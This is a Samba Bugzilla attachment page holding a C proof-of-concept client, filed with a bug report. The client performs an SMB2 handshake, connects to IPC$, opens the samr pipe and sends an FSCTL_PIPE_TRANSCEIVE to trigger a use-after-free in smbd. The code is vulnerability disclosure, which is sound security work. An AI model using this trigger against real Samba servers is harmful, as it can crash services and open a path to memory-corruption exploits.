The Samba-Bugzilla – Attachment 17988 Details for
Bug 15423
use-after-free in aio_del_req_from_fsp during smbd shutdown after failed IPC FSCTL_PIPE_TRANSCEIVE
Home
|
New
|
Browse
|
Search
|
[?]
|
Reports
|
Requests
|
Help
|
New Account
|
Log In
[x]
|
Forgot Password
Login:
[x]
client to trigger use-after-free in aio_del_req_from_fsp()
smx49a.c (text/x-csrc), 19.14 KB, created by
Robert Morris
on 2023-07-17 23:39:16 UTC
(
hide
)
Description:
client to trigger use-after-free in aio_del_req_from_fsp()
Filename:
MIME Type:
Creator:
Robert Morris
Created:
2023-07-17 23:39:16 UTC
Size:
19.14 KB
patch
obsolete
>#include <stdio.h> >#include <string.h> >#include <stdlib.h> >#include <unistd.h> >#include <sys/socket.h> >#include <sys/time.h> >#include <sys/types.h> >#include <sys/ioctl.h> >#include <netinet/in.h> >#include <sys/wait.h> >#include <sys/resource.h> >#include <arpa/inet.h> >#include <assert.h> >#include <ctype.h> >#include <fcntl.h> >#include <signal.h> > >int s = -1; >int tree_id = 0; >char session_id[8] = { 0, 0, 0, 0, 0, 0, 0, 0 }; >char file_id[16]; > >int >header(char *buf, int command) >{ > int ii = 0; > > // SMB-over-TCP 4-byte header > buf[ii++] = 0; // must be zero > buf[ii++] = 0; // high byte of len > *(short*)(buf+ii) = htons(sizeof(buf)-4); // non-inclusive len, filled later > ii += 2; > > // SMB2 SYNC Packet Header, MS-SMB2 2.2.1.2 > buf[ii++] = 0xfe; > buf[ii++] = 'S'; > buf[ii++] = 'M'; > buf[ii++] = 'B'; > *(short*)(buf+ii) = 64; // StructureSize (of SMB2 header) > ii += 2; > *(short*)(buf+ii) = 0; // CreditCharge > ii += 2; > *(short*)(buf+ii) = 0; // ChannelSequence > ii += 2; > *(short*)(buf+ii) = 0; // Reserved > ii += 2; > *(short*)(buf+ii) = command; > ii += 2; > *(short*)(buf+ii) = 6; // CreditRequest > ii += 2; > *(int*)(buf+ii) = 0; // Flags > ii += 4; > *(int*)(buf+ii) = 0; // NextCommand > ii += 4; > static unsigned long long seq = 0; > *(long long *)(buf+ii) = seq++; // MessageId > ii += 8; > *(int*)(buf+ii) = 0; // Reserved > ii += 4; > *(int*)(buf+ii) = tree_id; // TreeId > ii += 4; > memcpy(buf+ii, session_id, 8); // SessionId > ii += 8; > memset(buf+ii, 'd', 16); // Signature > ii += 16; > > return ii; >} > >int >readn(void *bufx, int n) >{ > char *buf = bufx; > while(n > 0){ > int cc = read(s, buf, n); > if(cc <= 0) > return -1; > n -= cc; > buf += cc; > } > return 0; >} > >int >readmsg(void *bufx) >{ > unsigned char *buf = bufx; > if(readn(buf, 4) < 0) > return -1; > int n = (buf[2] << 8) | buf[3]; > if(readn(buf+4, n) < 0) > return -1; > return n + 4; >} > > >void >negotiate() >{ > // SMB2 NEGOTIATE, MS-SMB2 2.2.3 > char buf[128+32]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x0000); > int ii0 = ii; > > *(short*)(buf+ii) = 36; // StructureSize, must be 36 > ii += 2; > *(short*)(buf+ii) = 1; // DialectCount > ii += 2; > *(short*)(buf+ii) = 1; // SecurityMode > ii += 2; > *(short*)(buf+ii) = 0; // Reserved > ii += 2; > *(int*)(buf+ii) = 0x3f; // Capabilities > ii += 4; > ii += 16; // ClientGuid from MS-DTYP > int context_offset_i = ii; > *(int*)(buf+ii) = 0; // NegotiateContextOffset > ii += 4; > *(short*)(buf+ii) = 1; // NegotiateContextCount > ii += 2; > *(short*)(buf+ii) = 0; // Reserved > ii += 2; > *(short*)(buf+ii) = 0x0311; // Dialect > ii += 2; > > while((ii - 4) % 8) > ii++; > > *(int*)(buf+context_offset_i) = ii - 4; // NegotiateContextOffset > > { > *(short*)(buf+ii) = 0x0001; // SMB2_PREAUTH_INTEGRITY_CAPABILITIES > ii += 2; > int data_length_i = ii; > *(short*)(buf+ii) = 0; // DataLength > ii += 2; > *(int*)(buf+ii) = 0; // Reserved > ii += 4; > int data_field_i = ii; > *(short*)(buf+ii) = 1; // HashAlgorithmCount > ii += 2; > *(short*)(buf+ii) = 2; // SaltLength > ii += 2; > *(short*)(buf+ii) = 1; // SHA-512 > ii += 2; > *(short*)(buf+ii) = 1; // Salt > ii += 2; > *(short*)(buf+data_length_i) = ii - data_field_i; > } > > assert(ii <= sizeof(buf)); > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > printf("negotiate writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for negotiate response\n", cc); > printf("Status: 0x%x\n", *(int*)(buf+4+8)); > } >} > >void >setup(int ntlmssp_command) >{ > // SMB2 SESSION_SETUP, MS-SMB2 2.2.5 > char buf[256]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x0001); > int ii0 = ii; > > *(short*)(buf+ii) = 25; // StructureSize > ii += 2; > buf[ii++] = 0; // Flags > buf[ii++] = 3; // SecurityMode > *(int*)(buf+ii) = 1; // Capabilities -- 1=DFS > ii += 4; > *(int*)(buf+ii) = 0; // Channel > ii += 4; > *(short*)(buf+ii) = ii + 12 - 4; // SecurityBufferOffset > ii += 2; > int secbuflen_i = ii; > *(short*)(buf+ii) = 32; // SecurityBufferLength > ii += 2; > memset(buf+ii, 0, 8); // PreviousSessionId > ii += 8; > > // SecurityBuffer > int secbufstart_i = ii; > memcpy(buf+ii, "NTLMSSP", 8); > ii += 8; > *(int*)(buf+ii) = ntlmssp_command; // ntlmssp_command > ii += 4; > if(ntlmssp_command == 1){ > *(int*)(buf+ii) = 0; // flags > ii += 4; > } > if(ntlmssp_command == 3){ > // parse_string = "CdBBAAABdbb"; > > // lm_resp > *(short*)(buf+ii) = 8; // len1 > ii += 2; > *(short*)(buf+ii) = 8; // len2 > ii += 2; > *(int*)(buf+ii) = 0; // ptr -- offset from "NTLMSSP" > ii += 4; > // ii += 4; > > // nt_resp -- this is the NTLM password > *(short*)(buf+ii) = 24; // len1 > ii += 2; > *(short*)(buf+ii) = 24; // len2 > ii += 2; > *(int*)(buf+ii) = 181 - secbufstart_i; // ptr > ii += 4; > // ii += 4; > > // domain > *(short*)(buf+ii) = 4; // len1 > ii += 2; > *(short*)(buf+ii) = 4; // len2 > ii += 2; > *(int*)(buf+ii) = 0; // ptr > ii += 4; > // ii += 4; > > // user > *(short*)(buf+ii) = 1; // len1 > ii += 2; > *(short*)(buf+ii) = 1; // len2 > ii += 2; > *(int*)(buf+ii) = 180 - secbufstart_i; // ptr > ii += 4; > // ii += 4; > > // netbios_name > *(short*)(buf+ii) = 4; // len1 > ii += 2; > *(short*)(buf+ii) = 4; // len2 > ii += 2; > *(int*)(buf+ii) = 0; // ptr > ii += 4; > // ii += 4; > > // encrypted_session_key > *(short*)(buf+ii) = 8; // len1 > ii += 2; > *(short*)(buf+ii) = 8; // len2 > ii += 2; > *(int*)(buf+ii) = 0; // ptr > ii += 4; > // ii += 4; > > *(int*)(buf+ii) = 0; // auth_flags > ii += 4; > > // version_blob > ii += 8; > > // mic_blob > ii += 16; > > // now ii = 180 > // user name > buf[ii++] = 'z'; > // maybe 24 bytes of encrypted NT NTLMv1 password > ii += 24; > } > > ii += 16; > > *(short*)(buf+secbuflen_i) = ii - secbufstart_i; // SecurityBufferLength > > assert(ii <= sizeof(buf)); > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > printf("setup writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for setup response\n", cc); > unsigned int status = *(int*)(buf+4+8); > printf("Status: 0x%x\n", status); > // 0xC0000016 means another setup round is required > if(status == 0xc0000016){ > memcpy(session_id, buf+44, 8); > } > } >} > >void >tree_connect() >{ > // SMB2 TREE_CONNECT, MS-SMB2 2.2.9 > char buf[128+32]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x0003); > int ii0 = ii; > > *(short*)(buf+ii) = 9; // StructureSize > ii += 2; > *(short*)(buf+ii) = 0; // Flags/Reserved > ii += 2; > int pathoffset_i = ii; > *(short*)(buf+ii) = 0; // PathOffset > ii += 2; > unsigned char path[] = { // IPC > 'I', 0, > 'P', 0, > 'C', 0, > '$', 0, > }; > *(short*)(buf+ii) = sizeof(path); // PathLength > ii += 2; > > // PathName > *(short*)(buf+pathoffset_i) = ii - 4; > memcpy(buf+ii, path, sizeof(path)); > ii += sizeof(path); > > assert(ii <= sizeof(buf)); > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > printf("tree_connect writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for tree_connect response\n", cc); > unsigned int status = *(int*)(buf+4+8); > printf("Status: 0x%x\n", status); > if(status == 0){ > tree_id = *(int*)(buf+40); > } > } >} > >void >smb_create() >{ > // SMB2 CREATE, MS-SMB2 2.2.13 > char buf[128+32]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x0005); > int ii0 = ii; > > *(short*)(buf+ii) = 57; // StructureSize > ii += 2; > buf[ii++] = 0; // SecurityFlags > buf[ii++] = 0; // RequestedOplockLevel > *(int*)(buf+ii) = 0; // ImpersonationLevel > ii += 4; > memset(buf+ii, 0, 8); // SmbCreateFlags > ii += 8; > memset(buf+ii, 0, 8); // Reserved > ii += 8; > *(int*)(buf+ii) = 3; // DesiredAccess > ii += 4; > *(int*)(buf+ii) = 0; // FileAttributes > ii += 4; > *(int*)(buf+ii) = 0; // ShareAccess > ii += 4; > *(int*)(buf+ii) = 3; // CreateDisposition; 0=supersede, 3=open_or_create > ii += 4; > *(int*)(buf+ii) = 0; // CreateOptions; 1=directory > ii += 4; > int nameoffset_i = ii; > *(short*)(buf+ii) = 0; // NameOffset > ii += 2; > unsigned char path[] = { // samr > 's', 0, > 'a', 0, > 'm', 0, > 'r', 0, > }; > *(short*)(buf+ii) = sizeof(path); // NameLength > ii += 2; > int contextoffset_i = ii; > *(int*)(buf+ii) = 0; // CreateContextsOffset > ii += 4; > int contextlength_i = ii; > *(int*)(buf+ii) = 0; // CreateContextsLength > ii += 4; > > *(short*)(buf+nameoffset_i) = ii - 4; > memcpy(buf+ii, path, sizeof(path)); > ii += sizeof(path); > > while((ii - 4) % 8) > ii++; > > *(int*)(buf+contextoffset_i) = ii - 4; > int c0 = ii; > *(int*)(buf+ii) = 0; // Next > ii += 4; > *(short*)(buf+ii) = 16; // NameOffset > ii += 2; > *(short*)(buf+ii) = 4; // NameLength > ii += 2; > *(short*)(buf+ii) = 0; // Reserved > ii += 2; > *(short*)(buf+ii) = 24; // DataOffset > ii += 2; > *(int*)(buf+ii) = 4; // DataLength > ii += 4; > *(int*)(buf+ii) = 0x416c5369; > ii += 4; > ii += 4; // pad > *(int*)(buf+ii) = 0; > ii += 4; > > *(int*)(buf+contextlength_i) = ii - c0; > > assert(ii <= sizeof(buf)); > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > printf("create writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for create response\n", cc); > unsigned int status = *(int*)(buf+4+8); > printf("Status: 0x%x\n", status); > if(status == 0){ > memcpy(file_id, buf+4+64+16*4, 16); > } > } >} > >void >smb_read() >{ > // SMB2 READ, MS-SMB2 2.2.19 > char buf[128]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x0008); > int ii0 = ii; > > *(short*)(buf+ii) = 49; // StructureSize > ii += 2; > buf[ii++] = 0; // Padding > buf[ii++] = 0; // Flags > *(int*)(buf+ii) = 512; // Length > ii += 4; > *(long long *)(buf+ii) = 0; // Offset > ii += 8; > memcpy(buf+ii, file_id, sizeof(file_id)); > ii += 16; > *(int*)(buf+ii) = 1; // MinimumCount > ii += 4; > *(int*)(buf+ii) = 0; // Channel > ii += 4; > *(int*)(buf+ii) = 0; // RemainingBytes > ii += 4; > *(short *)(buf+ii) = 0; // ReadChannelInfoOffset > ii += 2; > *(short *)(buf+ii) = 0; // ReadChannelInfoLength > ii += 2; > > assert(ii <= sizeof(buf)); > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > printf("read writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for read response\n", cc); > unsigned int status = *(int*)(buf+4+8); > printf("Status: 0x%x\n", status); > } >} > >void >smb_write() >{ > // SMB2 WRITE, MS-SMB2 2.2.21 > char buf[128+64]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x0009); > int ii0 = ii; > > *(short*)(buf+ii) = 49; // StructureSize > ii += 2; > *(short*)(buf+ii) = ii+46-4; // DataOffset > ii += 2; > *(int*)(buf+ii) = 64; // Length > ii += 4; > *(long long *)(buf+ii) = 0; // Offset > ii += 8; > memcpy(buf+ii, file_id, sizeof(file_id)); > ii += 16; > *(int*)(buf+ii) = 0; // Channel > ii += 4; > *(int*)(buf+ii) = 0; // RemainingBytes > ii += 4; > *(short *)(buf+ii) = 0; // WriteChannelInfoOffset > ii += 2; > *(short *)(buf+ii) = 0; // WriteChannelInfoLength > ii += 2; > *(int*)(buf+ii) = 0; // Flags > ii += 4; > > ii += 64; > > assert(ii <= sizeof(buf)); > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > printf("write writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for write response\n", cc); > unsigned int status = *(int*)(buf+4+8); > printf("Status: 0x%x\n", status); > } >} > >void >smb_lock() >{ > // SMB2 LOCK, MS-SMB2 2.2.26 > char buf[128]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x000A); > int ii0 = ii; > > *(short*)(buf+ii) = 48; // StructureSize > ii += 2; > *(short*)(buf+ii) = 1; // LockCount > ii += 2; > *(int*)(buf+ii) = 0; // LockSequenceNumber > ii += 4; > memcpy(buf+ii, file_id, sizeof(file_id)); > ii += 16; > > // Locks > *(long long *)(buf+ii) = 0; // Offset > ii += 8; > *(long long *)(buf+ii) = 1; // Length > ii += 8; > *(int*)(buf+ii) = 0x11; // Flags > ii += 4; > *(int*)(buf+ii) = 0; // Reserved > ii += 4; > > assert(ii <= sizeof(buf)); > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > printf("lock writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for lock response\n", cc); > unsigned int status = *(int*)(buf+4+8); > printf("Status: 0x%x\n", status); > } >} > >void >smb_ioctl_validate() >{ > // SMB2 IOCTL, MS-SMB2 2.2.31 > char buf[128+32]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x000B); > int ii0 = ii; > > *(short*)(buf+ii) = 57; // StructureSize > ii += 2; > *(short*)(buf+ii) = 0; // Reserved > ii += 2; > *(int*)(buf+ii) = 0x00140204; // CtlCode FSCTL_SRV_COPYCHUNK > ii += 4; > //memcpy(buf+ii, file_id, sizeof(file_id)); > memset(buf+ii, 0xff, 16); > ii += 16; > *(int*)(buf+ii) = ii - 4 + 32; // InputOffset > ii += 4; > *(int*)(buf+ii) = 32; // InputCount > ii += 4; > *(int*)(buf+ii) = 512; // MaxInputResponse > ii += 4; > *(int*)(buf+ii) = 0; // OutputOffset > ii += 4; > *(int*)(buf+ii) = 0; // OutputCount > ii += 4; > *(int*)(buf+ii) = 512; // MaxOutputResponse > ii += 4; > *(int*)(buf+ii) = 1; // Flags; 0=ioctl, 1=fsctl > ii += 4; > *(int*)(buf+ii) = 0; // Reserved > ii += 4; > > // VALIDATE_NEGOTIATE_INFO > *(int*)(buf+ii) = 0; // Capabilities > ii += 4; > ii += 16; // Guid > *(short*)(buf+ii) = 0; // SecurityMode > ii += 2; > *(short*)(buf+ii) = 1; // DialectCount > ii += 2; > > assert(ii <= sizeof(buf)); > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > printf("ioctl writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for ioctl response\n", cc); > unsigned int status = *(int*)(buf+4+8); > printf("Status: 0x%x\n", status); > } >} > >void >smb_ioctl_get_compression() >{ > // SMB2 IOCTL, MS-SMB2 2.2.31 > char buf[128+32]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x000B); > int ii0 = ii; > > *(short*)(buf+ii) = 57; // StructureSize > ii += 2; > *(short*)(buf+ii) = 0; // Reserved > ii += 2; > *(int*)(buf+ii) = 0x0009003C; // CtlCode FSCTL_GET_COMPRESSION > ii += 4; > memcpy(buf+ii, file_id, sizeof(file_id)); > ii += 16; > *(int*)(buf+ii) = ii - 4 + 32; // InputOffset > ii += 4; > *(int*)(buf+ii) = 32; // InputCount > ii += 4; > *(int*)(buf+ii) = 512; // MaxInputResponse > ii += 4; > *(int*)(buf+ii) = 0; // OutputOffset > ii += 4; > *(int*)(buf+ii) = 0; // OutputCount > ii += 4; > *(int*)(buf+ii) = 512; // MaxOutputResponse > ii += 4; > *(int*)(buf+ii) = 1; // Flags; 0=ioctl, 1=fsctl > ii += 4; > *(int*)(buf+ii) = 0; // Reserved > ii += 4; > > // VALIDATE_NEGOTIATE_INFO > *(int*)(buf+ii) = 0; // Capabilities > ii += 4; > ii += 16; // Guid > *(short*)(buf+ii) = 0; // SecurityMode > ii += 2; > *(short*)(buf+ii) = 1; // DialectCount > ii += 2; > > assert(ii <= sizeof(buf)); > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > printf("ioctl writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for ioctl response\n", cc); > unsigned int status = *(int*)(buf+4+8); > printf("Status: 0x%x\n", status); > } >} > >void >smb_ioctl_pipe() >{ > // SMB2 IOCTL, MS-SMB2 2.2.31 > char buf[128+32]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x000B); > int ii0 = ii; > > *(short*)(buf+ii) = 57; // StructureSize > ii += 2; > *(short*)(buf+ii) = 0; // Reserved > ii += 2; > *(int*)(buf+ii) = 0x0011c017; // CtlCode FSCTL_PIPE_TRANSCEIVE > ii += 4; > memcpy(buf+ii, file_id, sizeof(file_id)); > ii += 16; > *(int*)(buf+ii) = ii - 4 + 32; // InputOffset > ii += 4; > *(int*)(buf+ii) = 32; // InputCount > ii += 4; > *(int*)(buf+ii) = 512; // MaxInputResponse > ii += 4; > *(int*)(buf+ii) = 0; // OutputOffset > ii += 4; > *(int*)(buf+ii) = 0; // OutputCount > ii += 4; > *(int*)(buf+ii) = 512; // MaxOutputResponse > ii += 4; > *(int*)(buf+ii) = 1; // Flags; 0=ioctl, 1=fsctl > ii += 4; > *(int*)(buf+ii) = 0; // Reserved > ii += 4; > > assert(ii <= sizeof(buf)); > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > printf("ioctl writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for ioctl response\n", cc); > unsigned int status = *(int*)(buf+4+8); > printf("Status: 0x%x\n", status); > } >} > >void >query_directory() >{ > // SMB2 QUERY_DIRECTORY, MS-SMB2 2.2.33 > char buf[128+32]; > memset(buf, 1, sizeof(buf)); > > int ii = header(buf, 0x000E); > int ii0 = ii; > > *(short*)(buf+ii) = 33; // StructureSize > ii += 2; > buf[ii++] = 0x0C; // FileInformationClass > buf[ii++] = 0x00; // Flags > *(int*)(buf+ii) = 0; // FileIndex > ii += 4; > memcpy(buf+ii, file_id, sizeof(file_id)); > ii += 16; > *(short*)(buf+ii) = ii - 4 + 8; // FileNameOffset > ii += 2; > *(short*)(buf+ii) = 6; // FileNameLength > ii += 2; > *(int*)(buf+ii) = 512; // OutputBufferLength > ii += 4; > > buf[ii++] = '*'; > buf[ii++] = 0; > buf[ii++] = '2'; > buf[ii++] = 0; > buf[ii++] = '*'; > buf[ii++] = 0; > > assert(ii <= sizeof(buf)); > > ii = sizeof(buf); > > *(short*)(buf+2) = htons(ii-4); // non-inclusive len > > printf("query_directory writing %d bytes\n", ii); fflush(stdout); > > if(write(s, buf, ii) <= 0){ > perror("write"); > exit(1); > } > > { > unsigned char buf[1024]; > memset(buf, 0, sizeof(buf)); > int cc = readmsg(buf); > printf("read %d for query_directory response\n", cc); > unsigned int status = *(int*)(buf+4+8); > printf("Status: 0x%x\n", status); > } >} > >int >main() >{ > signal(SIGPIPE, SIG_IGN); > signal(SIGTERM, SIG_IGN); > > struct sockaddr_in sin; > memset(&sin, 0, sizeof(sin)); > sin.sin_family = AF_INET; > sin.sin_port = htons(445); // SMB over TCP > sin.sin_addr.s_addr = inet_addr("127.0.0.1"); > > while(1){ > s = socket(AF_INET, SOCK_STREAM, 0); > if(connect(s, (struct sockaddr *)&sin, sizeof(sin)) == 0) > break; > close(s); > sleep(1); > } > > sleep(1); > > negotiate(); > setup(1); > setup(3); > tree_connect(); > smb_create(); > smb_ioctl_pipe(); > > sleep(1); > close(s); >}
<b>You cannot view the attachment while viewing its details because your browser does not support IFRAMEs. <a href="attachment.cgi?id=17988">View the attachment on a separate page</a>.</b>
View Attachment As Raw
Actions:
View
Attachments on
bug 15423
: 17988 |
18112